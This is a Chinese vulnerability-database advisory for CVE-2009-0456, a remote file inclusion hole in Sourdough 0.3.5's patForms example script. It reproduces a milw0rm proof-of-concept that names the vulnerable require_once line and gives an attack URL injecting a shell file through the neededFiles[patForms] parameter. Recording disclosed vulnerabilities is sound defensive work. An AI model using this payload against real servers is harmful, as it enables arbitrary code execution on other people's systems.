Sourdough 'examples/example_clientside_javascript.php' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117325 漏洞类型 代码注入
发布时间 2009-02-02 更新时间 2009-02-10
CVE编号 CVE-2009-0456 CNNVD-ID CNNVD-200902-223
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7946
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-223
|漏洞详情
Sourdough是一个基于PHP5开发的应用广泛的WEB应用组件。patForms中的examples/example_clientside_javascript.php存在PHP远程文件包含漏洞。当在Sourdough0.3.5中使用时,远程攻击者可以借助neededFiles[patForms]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
-----------------:Remote File Include:-----------------
-------------------------------------------------------
script:sourdough 0.3.5
   
------------------------------------------------------------------
download from:http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/s/so/sourdough/sourdough-0.3.5-alpha.zip
   
------------------------------------------------------------------

........................................................
vul: /thirdparty/patForms/examples/example_clientside_javascript.php line 32

  require_once $neededFiles['patForms'];

------------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=shell.txt?


***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-02]
|参考资料

来源:BID
名称:33569
链接:http://www.securityfocus.com/bid/33569
来源:MILW0RM
名称:7946
链接:http://www.milw0rm.com/exploits/7946